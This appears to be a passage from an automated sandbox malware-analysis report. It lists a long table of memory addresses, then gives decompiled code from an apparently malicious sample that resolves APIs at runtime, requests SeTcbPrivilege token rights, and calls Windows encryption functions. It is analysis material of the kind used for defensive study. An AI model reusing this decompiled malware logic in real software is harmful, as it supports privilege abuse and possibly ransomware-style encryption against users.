    0x003a2f54
    0x003a2f57
    0x003a2f5a
    0x003a2f5d
    0x00000000
    0x00000000
    0x003a2f69
    0x003a2f6c
    0x00000000
    0x00000000
    0x003a2f72
    0x003a2f75
    0x003a2f7d
    0x003a2f85
    0x003a2f88
    0x003a2f88
    0x003a2f88
    0x003a2f93
    0x003a2f9b
    0x003a2f9d
    0x003a2fa8
    0x003a2fa9
    0x003a2fb7
    0x003a2fbf
    0x003a2fc0
    0x003a2fc0
    0x00000000
    0x003a2f9f
    0x003a2fa1
    0x003a2fc4
    0x003a2fc6
    0x003a2fc9
    0x003a2fcb
    0x003a2fce
    0x003a2fd3
    0x003a3169
    0x003a3169
    0x003a3170
    0x003a3177
    0x00000000
    0x00000000
    0x003a3180
    0x003a3187
    0x003a3187
    0x003a318d
    0x003a3193
    0x003a3196
    0x003a3199
    0x003a319b
    0x003a31e4
    0x003a31e4
    0x003a31e7
    0x003a3290
    0x003a3298
    0x003a32a0
    0x003a32a2
    0x003a32b2
    0x003a32b3
    0x003a32c1
    0x003a32c9
    0x003a32ca
    0x003a32ca
    0x003a32ce
    0x003a32d0
    0x003a32d3
    0x003a32e1
    0x003a32e3
    0x003a32e6
    0x003a32e9
    0x003a32eb
    0x003a3331
    0x003a3331
    0x003a3336
    0x003a3339
    0x003a333c
    0x003a333f
    0x003a334b
    0x003a3351
    0x003a3354
    0x003a3356
    0x003a3358
    0x003a3358
    0x003a335d
    0x003a3360
    0x003a3396
    0x003a339a
    0x003a33f5
    0x003a33f5
    0x003a33f8
    0x003a33f8
    0x003a33fa
    0x003a33fe
    0x003a3403
    0x003a3409
    0x003a340c
    0x003a340f
    0x003a3412
    0x003a3412
    0x003a3418
    0x003a341c
    0x003a341f
    0x00000000
    0x00000000
    0x003a3425
    0x003a342b
    0x003a342d
    0x003a33ea
    0x003a33ed
    0x00000000
    0x003a33ed
    0x003a33e4
    0x003a33e7
    0x00000000
    0x003a33e7
    0x003a339f
    0x003a33a2
    0x00000000
    0x00000000
    0x003a33a7
    0x003a33ad
    0x003a33ad
    0x003a33af
    0x003a33b1
    0x003a33b6
    0x003a33b9
    0x003a33bc
    0x003a33bf
    0x003a33bf
    0x003a33c3
    0x003a33c7
    0x003a33cb
    0x003a33ce
    0x00000000
    0x00000000
    0x003a33d0
    0x003a33d4
    0x00000000
    0x00000000
    0x003a33da
    0x003a33e0
    0x003a33e2
    0x00000000
    0x00000000
    0x00000000
    0x003a3362
    0x003a3362
    0x003a3365
    0x003a3368
    0x003a336a
    0x00000000
    0x00000000
    0x003a3370
    0x003a3370
    0x003a3373
    0x003a3376
    0x003a3694
    0x003a369b
    0x00000000
    0x003a369b
    0x003a338b
    0x003a338e
    0x003a3391
    0x00000000
    0x003a3391
    0x003a3360
    0x003a3341
    0x003a3345
    0x003a28c1
    0x003a28c1
    0x00000000
    0x003a28c1
    0x00000000
    0x003a3345
    0x003a3318
    0x003a3318
    0x003a331b
    0x003a32f2
    0x003a32f5
    0x003a3308
    0x003a330b
    0x003a330b
    0x003a330b
    0x003a330e
    0x003a3312
    0x003a3315
    0x003a3315
    0x00000000
    0x003a3315
    0x003a32f7
    0x003a32f7
    0x003a32fb
    0x003a3682
    0x003a3689
    0x00000000
    0x003a3689
    0x003a3301
    0x00000000
    0x003a3301
    0x003a331d
    0x003a3325
    0x003a332b
    0x003a332e
    0x003a332e
    0x003a332e
    0x00000000
    0x003a332e
    0x003a32a6
    0x003a32a9
    0x00000000
    0x003a32a9
    0x003a31f0
    0x003a31f5
    0x003a31f8
    0x003a3285
    0x003a328a
    0x003a328d
    0x003a328d
    0x00000000
    0x003a328d
    0x003a31fa
    0x003a3202
    0x003a320a
    0x003a320c
    0x003a321d
    0x003a321e
    0x003a3220
    0x003a3242
    0x003a3245
    0x003a3248
    0x003a325b
    0x003a325e
    0x003a325e
    0x003a325e
    0x003a3261
    0x003a3263
    0x003a3265
    0x003a3268
    0x003a326b
    0x003a326e
    0x00000000
    0x00000000
    0x00000000
    0x003a3270
    0x003a324a
    0x003a324a
    0x003a324e
    0x003a3670
    0x003a3677
    0x00000000
    0x003a3677
    0x003a3254
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x003a3222
    0x003a3222
    0x003a322e
    0x003a3236
    0x003a3237
    0x003a3239
    0x00000000
    0x00000000
    0x003a323b
    0x003a323e
    0x003a3240
    0x00000000
    0x00000000
    0x00000000
    0x003a3240
    0x00000000
    0x003a3222
    0x003a320e
    0x003a3211
    0x003a3213
    0x00000000
    0x00000000
    0x003a3215
    0x003a3217
    0x00000000
    0x00000000
    0x00000000
    0x003a3219
    0x003a319d
    0x003a319f
    0x003a31d2
    0x003a31d2
    0x003a31de
    0x003a31e1
    0x003a31e1
    0x003a31e1
    0x00000000
    0x003a31e1
    0x003a31a1
    0x003a31a4
    0x003a31a7
    0x003a31ba
    0x003a31bd
    0x003a31bd
    0x003a31bd
    0x003a31c0
    0x003a31c2
    0x003a31c4
    0x003a31c7
    0x003a31ca
    0x003a31cd
    0x00000000
    0x00000000
    0x003a31cf
    0x00000000
    0x003a31cf
    0x003a31a9
    0x003a31a9
    0x003a31ad
    0x003a365e
    0x003a3665
    0x00000000
    0x003a3665
    0x003a31b3
    0x00000000
    0x003a31b3
    0x003a2fd9
    0x003a2fdc
    0x003a2fe4
    0x003a2fec
    0x003a2fef
    0x003a2fef
    0x003a2fef
    0x003a2ffa
    0x003a3002
    0x003a3004
    0x003a300f
    0x003a3010
    0x003a301e
    0x003a3026
    0x003a3027
    0x003a3027
    0x00000000
    0x003a3006
    0x003a3008
    0x003a302b
    0x003a302b
    0x003a3030
    0x003a3036
    0x003a3038
    0x003a303a
    0x003a303f
    0x003a3163
    0x003a3163
    0x003a3163
    0x003a3166
    0x00000000
    0x003a3166
    0x003a3045
    0x003a304b
    0x00000000
    0x003a304b
    0x003a3004
    0x003a2f9d
    0x003a3053
    0x003a3056
    0x003a30fa
    0x003a3102
    0x003a310a
    0x003a310c
    0x003a311c
    0x003a311d
    0x003a312b
    0x003a3133
    0x003a3134
    0x003a3134
    0x003a3138
    0x003a313a
    0x003a313d
    0x003a313f
    0x003a3142
    0x003a3147
    0x00000000
    0x00000000
    0x003a3149
    0x003a3149
    0x003a314c
    0x003a314f
    0x003a36a6
    0x003a36ad
    0x00000000
    0x003a36ad
    0x003a3158
    0x003a315b
    0x00000000
    0x003a315b
    0x003a3110
    0x003a3113
    0x00000000
    0x003a3113
    0x003a305c
    0x003a305f
    0x003a30d9
    0x003a30ef
    0x003a30f4
    0x003a30f7
    0x003a30f7
    0x00000000
    0x003a30f7
    0x003a3061
    0x003a3069
    0x003a3071
    0x003a3073
    0x003a3084
    0x003a3085
    0x003a3087
    0x003a30a9
    0x003a30ac
    0x003a30af
    0x003a30c2
    0x003a30c5
    0x003a30c5
    0x003a30c5
    0x003a30c8
    0x003a30ca
    0x003a30cc
    0x003a30cf
    0x003a30d2
    0x003a30d5
    0x00000000
    0x00000000
    0x00000000
    0x003a30d7
    0x003a30b1
    0x003a30b1
    0x003a30b5
    0x003a364c
    0x003a3653
    0x00000000
    0x003a3653
    0x003a30bb
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x003a3089
    0x003a3089
    0x003a3095
    0x003a309d
    0x003a309e
    0x003a30a0
    0x00000000
    0x00000000
    0x003a30a2
    0x003a30a5
    0x003a30a7
    0x00000000
    0x00000000
    0x00000000
    0x003a30a7
    0x00000000
    0x003a3089
    0x003a3075
    0x003a3078
    0x003a307a
    0x00000000
    0x00000000
    0x003a307c
    0x003a307e
    0x00000000
    0x00000000
    0x00000000
    0x003a3080
    0x003a2b49
    0x003a2b49
    0x003a2b57
    0x003a2b61
    0x003a2b69
    0x003a2b73
    0x003a2b7b
    0x003a2b83
    0x003a2b87
    0x003a2b8a
    0x003a2b8c
    0x003a2b8f
    0x003a2b91
    0x003a2bac
    0x003a2bac
    0x003a2bb0
    0x003a2bb0
    0x003a2bb2
    0x003a2bb5
    0x003a2bb8
    0x003a2bb9
    0x003a2bb9
    0x003a2bc2
    0x003a2bc4
    0x003a2bc8
    0x003a2bcb
    0x003a2bcd
    0x003a2bcd
    0x003a2bd2
    0x003a2bd8
    0x003a2be3
    0x003a2be3
    0x003a2be7
    0x003a2beb
    0x003a2bef
    0x003a2bf2
    0x003a2d49
    0x003a2d49
    0x003a2d4d
    0x003a2f4c
    0x003a2f4c
    0x00000000
    0x003a2f4c
    0x003a2d53
    0x003a2d53
    0x003a2d53
    0x003a2d57
    0x003a2d5d
    0x003a2d60
    0x003a2f0d
    0x003a2f15
    0x003a2f18
    0x003a3641
    0x003a3641
    0x00000000
    0x003a3641
    0x003a2f2a
    0x003a2f44
    0x003a2f49
    0x00000000
    0x003a2f49
    0x003a2d66
    0x003a2d69
    0x003a2e12
    0x003a2e1a
    0x003a2e22
    0x003a2e24
    0x003a2e34
    0x003a2e35
    0x003a2e43
    0x003a2e4b
    0x003a2e4c
    0x003a2e4c
    0x003a2e50
    0x003a2e52
    0x003a2e55
    0x003a2e57
    0x003a2e5a
    0x003a2e5d
    0x003a2e60
    0x003a2e74
    0x003a2e80
    0x003a2e80
    0x003a2e87
    0x003a2e8a
    0x003a2e8c
    0x003a2ebf
    0x003a2ebf
    0x003a2ec7
    0x003a2ec9
    0x003a2ed0
    0x003a2eda
    0x003a2edc
    0x003a2edf
    0x003a2eee
    0x003a2eee
    0x003a2ee1
    0x003a2ee4
    0x003a2ee4
    0x003a2efd
    0x003a2f02
    0x003a2f05
    0x00000000
    0x003a2f05
    0x003a2e8e
    0x003a2e91
    0x003a2e94
    0x003a2ea7
    0x003a2eaa
    0x003a2eaa
    0x003a2eaa
    0x003a2ead
    0x003a2eaf
    0x003a2eb1
    0x003a2eb4
    0x003a2eb7
    0x003a2eba
    0x00000000
    0x00000000
    0x003a2ebc
    0x00000000
    0x003a2ebc
    0x003a2e96
    0x003a2e96
    0x003a2e9a
    0x003a362f
    0x003a3636
    0x00000000
    0x003a3636
    0x003a2ea0
    0x00000000
    0x003a2ea0
    0x003a2e76
    0x003a2e7a
    0x003a3624
    0x003a3624
    0x00000000
    0x003a3624
    0x00000000
    0x003a2e7a
    0x003a2e65
    0x003a2e68
    0x00000000
    0x003a2e68
    0x003a2e28
    0x003a2e2b
    0x00000000
    0x003a2e2b
    0x003a2d72
    0x003a2d77
    0x003a2d7a
    0x003a2dfb
    0x003a2e07
    0x003a2e0c
    0x003a2e0f
    0x003a2e0f
    0x00000000
    0x003a2e0f
    0x003a2d7c
    0x003a2d84
    0x003a2d8c
    0x003a2d8e
    0x003a2d9f
    0x003a2da0
    0x003a2da2
    0x003a2dc4
    0x003a2dc7
    0x003a2dca
    0x003a2ddd
    0x003a2de0
    0x003a2de0
    0x003a2de0
    0x003a2de3
    0x003a2de5
    0x003a2de7
    0x003a2dea
    0x003a2ded
    0x003a2df0
    0x00000000
    0x00000000
    0x00000000
    0x003a2df2
    0x003a2dcc
    0x003a2dcc
    0x003a2dd0
    0x003a3612
    0x003a3619
    0x00000000
    0x003a3619
    0x003a2dd6
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x003a2da4
    0x003a2da4
    0x003a2db0
    0x003a2db8
    0x003a2db9
    0x003a2dbb
    0x00000000
    0x00000000
    0x003a2dbd
    0x003a2dc0
    0x003a2dc2
    0x00000000
    0x00000000
    0x00000000
    0x003a2dc2
    0x00000000
    0x003a2da4
    0x003a2d90
    0x003a2d93
    0x003a2d95
    0x00000000
    0x00000000
    0x003a2d97
    0x003a2d99
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x003a2bf8
    0x003a2bf8
    0x003a2bfb
    0x003a2bff
    0x003a2c01
    0x003a2c03
    0x00000000
    0x00000000
    0x003a2c09
    0x003a2c0d
    0x003a2c0f
    0x003a2c13
    0x003a2c15
    0x003a2c17
    0x003a2c19
    0x003a2c2b
    0x003a2c2b
    0x003a2c2e
    0x003a2cd0
    0x003a2cd0
    0x003a2cd7
    0x003a2cda
    0x003a2cdc
    0x003a2cde
    0x003a2ce1
    0x003a2ce1
    0x003a2ce1
    0x003a2ce5
    0x003a2ce5
    0x003a2ce8
    0x003a2ceb
    0x003a2cee
    0x003a2d20
    0x003a2d29
    0x003a2d29
    0x003a2d2b
    0x003a2d33
    0x003a2d33
    0x00000000
    0x003a2cf0
    0x003a2cf0
    0x003a2cf3
    0x003a2cf3
    0x003a2d03
    0x003a2d06
    0x003a2d09
    0x003a2d0c
    0x003a2d1a
    0x003a2d0e
    0x003a2d0e
    0x003a2d11
    0x003a2d15
    0x003a2d15
    0x003a2d1d
    0x003a2d1d
    0x003a2d1d
    0x00000000
    0x003a2cf3
    0x003a2cee
    0x003a2c3f
    0x003a2c42
    0x003a2c47
    0x00000000
    0x00000000
    0x003a2c50
    0x003a2c52
    0x003a2c52
    0x003a2c59
    0x003a2c5d
    0x003a2c5f
    0x003a2c62
    0x003a2c65
    0x003a2c65
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x003a2c1b
    0x003a2c1b
    0x003a2c1e
    0x003a2c26
    0x003a2c28
    0x003a2c28
    0x003a2c28
    0x00000000
    0x003a2d36
    0x003a2d36
    0x003a2d39
    0x003a2d3f
    0x003a2d3f
    0x00000000
    0x003a2bf8
    0x003a2bda
    0x003a2bdd
    0x003a3604
    0x003a3607
    0x003a3607
    0x00000000
    0x003a3607
    0x00000000
    0x003a2bdd
    0x003a2b96
    0x003a2b9a
    0x003a2ba5
    0x003a2ba7
    0x003a2ba8
    0x003a2ba8
    0x00000000
    0x003a2b9a
    0x003a2a9b
    0x003a2a9b
    0x003a2aa2
    0x003a2aa4
    0x003a2adf
    0x003a2ae8
    0x003a2aec
    0x003a2aec
    0x003a2afa
    0x003a2afd
    0x003a2b01
    0x003a2b03
    0x003a2b06
    0x00000000
    0x003a2b06
    0x003a2aa6
    0x003a2aa9
    0x003a2aac
    0x003a2abf
    0x003a2ac2
    0x003a2ac2
    0x003a2ac2
    0x003a2ac5
    0x003a2ac7
    0x003a2ac9
    0x003a2acc
    0x003a2acf
    0x003a2ad2
    0x003a2ad2
    0x003a2ad9
    0x003a2adb
    0x00000000
    0x00000000
    0x003a2add
    0x00000000
    0x003a2add
    0x003a2aae
    0x003a2aae
    0x003a2ab2
    0x003a35e0
    0x003a35e7
    0x00000000
    0x003a35e7
    0x003a2ab8
    0x00000000
    0x003a2ab8
    0x003a2a30
    0x003a2a36
    0x003a2a40
    0x003a2a47
    0x003a2a55
    0x003a2a57
    0x003a2a5e
    0x003a2a67
    0x003a2a79
    0x003a2a7a
    0x003a2a7a
    0x003a2a82
    0x003a2a8a
    0x003a2a8b
    0x00000000
    0x003a2a8b
    0x003a29c2
    0x003a29c6
    0x00000000
    0x00000000
    0x003a29cc
    0x003a36da
    0x003a36df
    0x003a36e1
    0x003a36b8
    0x003a36bb
    0x003a36ca
    0x003a36cd
    0x003a36cd
    0x003a36cd
    0x003a36d0
    0x003a36d4
    0x003a36d7
    0x003a36d7
    0x00000000
    0x003a36d7
    0x003a36bd
    0x003a36bd
    0x003a36c1
    0x003a36f3
    0x003a36fa
    0x00000000
    0x003a36fa
    0x003a36c3
    0x00000000
    0x003a36c3
    0x003a36e5
    0x003a36e8
    0x003a36eb
    0x003a36ed
    0x00000000
    0x003a36ed
    0x003a295f
    0x003a2961
    0x00000000
    0x00000000
    0x003a2963
    0x003a2963
    0x003a2967
    0x00000000
    0x00000000
    0x003a2969
    0x003a296c
    0x003a296f
    0x003a355f
    0x003a3566
    0x00000000
    0x003a3566
    0x003a2975
    0x003a2975
    0x003a2978
    0x003a3571
    0x003a3575
    0x00000000
    0x00000000
    0x003a357b
    0x003a3582
    0x00000000
    0x003a3582
    0x003a2981
    0x003a2984
    0x003a2987
    0x003a2989
    0x003a298b
    0x003a298d
    0x003a298d
    0x003a298f
    0x003a2992
    0x003a299c
    0x003a2994
    0x003a2994
    0x003a2996
    0x003a2998
    0x003a2998
    0x003a2996
    0x003a29a6
    0x003a29ab
    0x003a29ae
    0x003a29b1
    0x003a29b4
    0x003a29b7
    0x00000000
    0x003a29b7
    0x003a2926
    0x003a2929
    0x00000000
    0x00000000
    0x003a292e
    0x003a2931
    0x00000000
    0x003a2931
    0x003a2902
    0x003a2906
    0x00000000
    0x003a2906
    0x003a28ef
    0x003a28ef
    0x003a28f0
    0x00000000
    0x00000000
    0x003a28f2
    0x003a28f3
    0x00000000
    0x00000000
    0x00000000
    0x003a28f9
    0x003a2835
    0x00000000
    0x00000000
    0x003a283b
    0x003a283e
    0x003a28aa
    0x003a28aa
    0x003a28ad
    0x00000000
    0x00000000
    0x003a28b3
    0x003a28b3
    0x003a28b4
    0x003a2729
    0x003a2729
    0x00000000
    0x003a2729
    0x003a28ba
    0x003a28bb
    0x00000000
    0x00000000
    0x00000000
    0x003a28bb
    0x003a2840
    0x00000000
    0x00000000
    0x003a2846
    0x003a2846
    0x003a2849
    0x003a2896
    0x003a2898
    0x00000000
    0x00000000
    0x003a289e
    0x003a28a2
    0x00000000
    0x003a28a2
    0x003a284b
    0x003a284b
    0x003a284c
    0x003a2882
    0x003a2884
    0x00000000
    0x00000000
    0x003a288a
    0x003a288e
    0x00000000
    0x003a288e
    0x003a284e
    0x003a284e
    0x003a284f
    0x003a286e
    0x003a2870
    0x00000000
    0x00000000
    0x003a2876
    0x003a287a
    0x00000000
    0x003a287a
    0x003a2851
    0x003a2854
    0x00000000
    0x00000000
    0x003a285a
    0x003a285c
    0x00000000
    0x00000000
    0x003a2862
    0x003a2866
    0x00000000
    0x003a2866
    0x003a2608
    0x00000000
    0x00000000
    0x003a260e
    0x003a2611
    0x003a2795
    0x003a2795
    0x003a2798
    0x003a2816
    0x003a2818
    0x003a281a
    0x00000000
    0x00000000
    0x003a2820
    0x003a2824
    0x00000000
    0x003a2824
    0x003a279a
    0x003a279a
    0x003a279d
    0x003a2800
    0x003a2802
    0x003a2804
    0x00000000
    0x00000000
    0x003a280a
    0x003a280e
    0x00000000
    0x003a280e
    0x003a27a0
    0x003a27a0
    0x003a27a1
    0x003a27ea
    0x003a27ec
    0x003a27ee
    0x00000000
    0x00000000
    0x003a27f4
    0x003a27f8
    0x00000000
    0x003a27f8
    0x003a27a3
    0x003a27a3
    0x003a27a4
    0x00000000
    0x00000000
    0x003a27aa
    0x003a27aa
    0x003a27ab
    0x003a27d4
    0x003a27d6
    0x003a27d8
    0x00000000
    0x00000000
    0x003a27de
    0x003a27e2
    0x00000000
    0x003a27e2
    0x003a27ad
    0x003a27ad
    0x003a27b0
    0x00000000
    0x00000000
    0x003a27b7
    0x003a27b8
    0x00000000
    0x00000000
    0x003a27be
    0x003a27c0
    0x003a27c2
    0x00000000
    0x00000000
    0x003a27c8
    0x003a27cc
    0x00000000
    0x003a27cc
    0x003a2617
    0x00000000
    0x00000000
    0x003a2620
    0x00000000
    0x00000000
    0x003a2626
    0x00000000
    0x003a262d
    0x003a2632
    0x003a2635
    0x003a2638
    0x003a263b
    0x003a263e
    0x003a2641
    0x003a2644
    0x003a2647
    0x003a264a
    0x003a2650
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x003a2656
    0x003a2656
    0x003a265a
    0x003a2668
    0x003a266c
    0x003a267b
    0x003a267b
    0x003a267b
    0x00000000
    0x003a267b
    0x003a2671
    0x003a2674
    0x00000000
    0x003a265c
    0x003a2660
    0x003a2663
    0x003a267f
    0x003a267f
    0x003a2684
    0x00000000
    0x00000000
    0x003a2689
    0x003a268c
    0x00000000
    0x003a268c
    0x00000000
    0x003a2691
    0x003a2693
    0x003a2695
    0x003a26a3
    0x003a26a3
    0x003a26a7
    0x003a26bb
    0x003a26bb
    0x003a26bb
    0x003a26bf
    0x003a26bf
    0x003a26c2
    0x003a26ca
    0x003a26d0
    0x003a26d1
    0x003a26d5
    0x003a26e9
    0x003a26e4
    0x003a26e4
    0x003a26e4
    0x003a26f4
    0x003a2701
    0x003a2708
    0x003a2718
    0x003a2718
    0x003a2712
    0x003a2712
    0x003a2712
    0x003a2719
    0x003a2719
    0x003a2720
    0x003a2723
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x003a2723
    0x003a26a9
    0x003a26b0
    0x00000000
    0x003a26b0
    0x003a2697
    0x003a269a
    0x003a269b
    0x003a269e
    0x00000000
    0x00000000
    0x003a2734
    0x003a2736
    0x003a2738
    0x00000000
    0x00000000
    0x003a273e
    0x003a2742
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x003a274a
    0x003a274c
    0x003a274e
    0x00000000
    0x00000000
    0x003a2754
    0x003a2758
    0x00000000
    0x00000000
    0x003a2760
    0x003a2762
    0x003a2764
    0x00000000
    0x00000000
    0x003a276a
    0x003a276e
    0x00000000
    0x00000000
    0x003a2776
    0x003a2778
    0x003a277a
    0x00000000
    0x00000000
    0x003a2780
    0x003a2782
    0x003a2785
    0x003a2786
    0x003a278d
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x003a2626

    APIs
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 53%
    			E0039F990(intOrPtr* _a4) {
    				_Unknown_base(*)()* _v8;
    				char _v12;
    				char _v16;
    				char _v20;
    				char _v24;
    				char _v28;
    				intOrPtr _v32;
    				char _v40;
    				char _v44;
    				char _v60;
    				char _v160;
    				intOrPtr _t53;
    				intOrPtr* _t57;
    				intOrPtr* _t58;
    				_Unknown_base(*)()* _t59;
    				intOrPtr _t68;
    				intOrPtr _t70;
    				signed int _t74;
    				intOrPtr* _t75;
    				intOrPtr _t99;
    				intOrPtr* _t104;
    				intOrPtr _t113;
    				intOrPtr _t114;
    				intOrPtr _t120;
    				intOrPtr _t121;
    				intOrPtr _t123;
    				intOrPtr _t124;
    				intOrPtr _t128;
    				signed int _t130;
    				signed int _t131;
    				struct HINSTANCE__* _t132;
    				_Unknown_base(*)()* _t139;
    
    				_v16 = 0;
    				_v12 = 0xffffffff;
    				_v20 = 0;
    				_v24 = 0;
    				_v8 = 0;
    				_t139 =  *0x3b85c8; // 0x73bd1f81
    				if(_t139 != 0) {
    					L3:
    					_t53 =  *0x3b8628; // 0x593938
    					_v28 = 0;
    					_t20 = _t53 + 0x150; // 0x593a88
    					_t130 = _t20;
    					_push( *((intOrPtr*)( *((intOrPtr*)(_t53 + 0x100))))(0x28,  &_v8));
    					if( *((intOrPtr*)( *_t130))() != 0) {
    						_t121 =  *0x3b8628; // 0x593938
    						_push( &_v40);
    						_push(L"SeTcbPrivilege");
    						_push(0);
    						if( *((intOrPtr*)( *((intOrPtr*)(_t121 + 0x188))))() != 0) {
    							_t123 =  *0x3b8628; // 0x593938
    							_v44 = 1;
    							_v32 = 2;
    							 *((intOrPtr*)( *((intOrPtr*)(_t123 + 0x18c))))(_v8, 0,  &_v44, 0x10,  &_v60,  &_v28);
    						}
    					}
    					_t57 =  *0x3b85dc; // 0x73bd4023
    					_t131 = _t130 | 0xffffffff;
    					if(_t57 == 0) {
    						L17:
    						_t58 =  *0x3b85fc; // 0x0
    						if(_t58 == 0) {
    							L22:
    							_t59 = _v8;
    							if(_t59 == 0) {
    								L24:
    								return _t59;
    							}
    							_t113 =  *0x3b8628; // 0x593938
    							 *((intOrPtr*)( *((intOrPtr*)(_t113 + 0x18c))))(_t59, 0,  &_v60, 0x10, 0, 0);
    							_t114 =  *0x3b8628; // 0x593938
    							return  *((intOrPtr*)( *((intOrPtr*)(_t114 + 0xf8))))(_v8);
    						}
    						_t131 =  *_t58();
    						if(_t131 == 0xffffffff) {
    							goto L22;
    						}
    						L19:
    						_t99 =  *0x3b8628; // 0x593938
    						 *((intOrPtr*)( *((intOrPtr*)(_t99 + 0x190))))();
    						_push( &_v12);
    						_push(_t131);
    						if( *0x3b85c8() != 0) {
    							_t68 =  *0x3b8628; // 0x593938
    							_push( &_v16);
    							_push(1);
    							_push(1);
    							_push(0);
    							_push(0x2000000);
    							_push(_v12);
    							if( *((intOrPtr*)( *((intOrPtr*)(_t68 + 0x144))))() != 0) {
    								_t70 =  *0x3b8628; // 0x593938
    								 *((intOrPtr*)( *((intOrPtr*)(_t70 + 0xf8))))(_v12);
    								 *_a4 = _v16;
    							}
    						}
    						goto L22;
    					}
    					_t30 =  &_v24; // 0x394354
    					_push( &_v20);
    					_push(1);
    					_push(0);
    					_push(0);
    					if( *_t57() == 0) {
    						goto L17;
    					}
    					_t32 =  &_v24; // 0x394354
    					_t120 =  *_t32;
    					_t128 = _v20;
    					_t74 = 0;
    					if(_t120 <= 0) {
    						L14:
    						_t75 =  *0x3b85f8; // 0x73bd1b65
    						if(_t75 != 0) {
    							 *_t75(_t128);
    						}
    						if(_t131 != 0xffffffff) {
    							goto L19;
    						} else {
    							goto L17;
    						}
    					} else {
    						_t104 = _t128 + 8;
    						while( *_t104 != 0) {
    							_t74 = _t74 + 1;
    							_t104 = _t104 + 0xc;
    							if(_t74 < _t120) {
    								continue;
    							}
    							goto L14;
    						}
    						_t131 =  *(_t128 + (_t74 + _t74 * 2) * 4);
    						goto L14;
    					}
    				}
    				E00396CB0( &_v160, 0x97);
    				_t124 =  *0x3b8628; // 0x593938
    				_t59 =  *((intOrPtr*)( *((intOrPtr*)(_t124 + 0x48))))( &_v160);
    				_t132 = _t59;
    				if(_t132 == 0) {
    					goto L24;
    				}
    				E00396CB0( &_v160, 0x98);
    				 *0x3b85dc = GetProcAddress(_t132,  &_v160);
    				E00396CB0( &_v160, 0x99);
    				 *0x3b85f8 = GetProcAddress(_t132,  &_v160);
    				E00396CB0( &_v160, 0x9a);
    				 *0x3b85fc = GetProcAddress(_t132,  &_v160);
    				E00396CB0( &_v160, 0x9b);
    				_t59 = GetProcAddress(_t132,  &_v160);
    				 *0x3b85c8 = _t59;
    				if(_t59 == 0) {
    					goto L24;
    				}
    				goto L3;
    			}

    APIs
    • GetProcAddress.KERNEL32(00000000,?), ref: 0039FA0F
    • GetProcAddress.KERNEL32(00000000,?), ref: 0039FA32
    • GetProcAddress.KERNEL32(00000000,?), ref: 0039FA55
    • GetProcAddress.KERNEL32(00000000,?), ref: 0039FA78
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    APIs
    • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000018,F0000000,?,?,000001FD,?,?,?,?,00000000,00000200), ref: 003A3BCF
    • CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,?,?,00000020), ref: 003A3C60
    • CryptDestroyKey.ADVAPI32(?), ref: 003A3C71
    • CryptImportKey.ADVAPI32(?,00000000,0000001C,00000000,00000000,?), ref: 003A3D87
    • CryptReleaseContext.ADVAPI32(?,00000000), ref: 003A3DD2
    • CryptDestroyKey.ADVAPI32(?), ref: 003A3DF2
    • CryptReleaseContext.ADVAPI32(?,00000000), ref: 003A3DFD
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    C-Code - Quality: 92%
    			E00392B83(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
    				intOrPtr _v0;
    				void* _v804;
    				intOrPtr _v808;
    				intOrPtr _v812;
    				intOrPtr _t11;
    				intOrPtr _t12;
    				intOrPtr _t13;
    				intOrPtr* _t26;
    				void* _t29;
    
    				_t29 = __ecx -  *0x3b8100; // 0x6c988642
    				if(_t29 != 0) {
    					 *0x3b8760 = __eax;
    					 *0x3b875c = __ecx;
    					 *0x3b8758 = __edx;
    					 *0x3b8754 = __ebx;
    					 *0x3b8750 = __esi;
    					 *0x3b874c = __edi;
    					 *0x3b8778 = ss;
    					 *0x3b876c = cs;
    					 *0x3b8748 = ds;
    					 *0x3b8744 = es;
    					 *0x3b8740 = fs;
    					 *0x3b873c = gs;
    					asm("pushfd");
    					_pop( *0x3b8770);
    					 *0x3b8764 =  *_t26;
    					 *0x3b8768 = _v0;
    					 *0x3b8774 =  &_a4;
    					 *0x3b86b0 = 0x10001;
    					_t11 =  *0x3b8768; // 0x0
    					 *0x3b866c = _t11;
    					 *0x3b8660 = 0xc0000409;
    					 *0x3b8664 = 1;
    					_t12 =  *0x3b8100; // 0x6c988642
    					_v812 = _t12;
    					_t13 =  *0x3b8104; // 0x936779bd
    					_v808 = _t13;
    					SetUnhandledExceptionFilter(0);
    					UnhandledExceptionFilter(0x3b60b8);
    					return TerminateProcess(GetCurrentProcess(), 0xc0000409);
    				} else {
    					return __eax;
    				}
    			}

    APIs
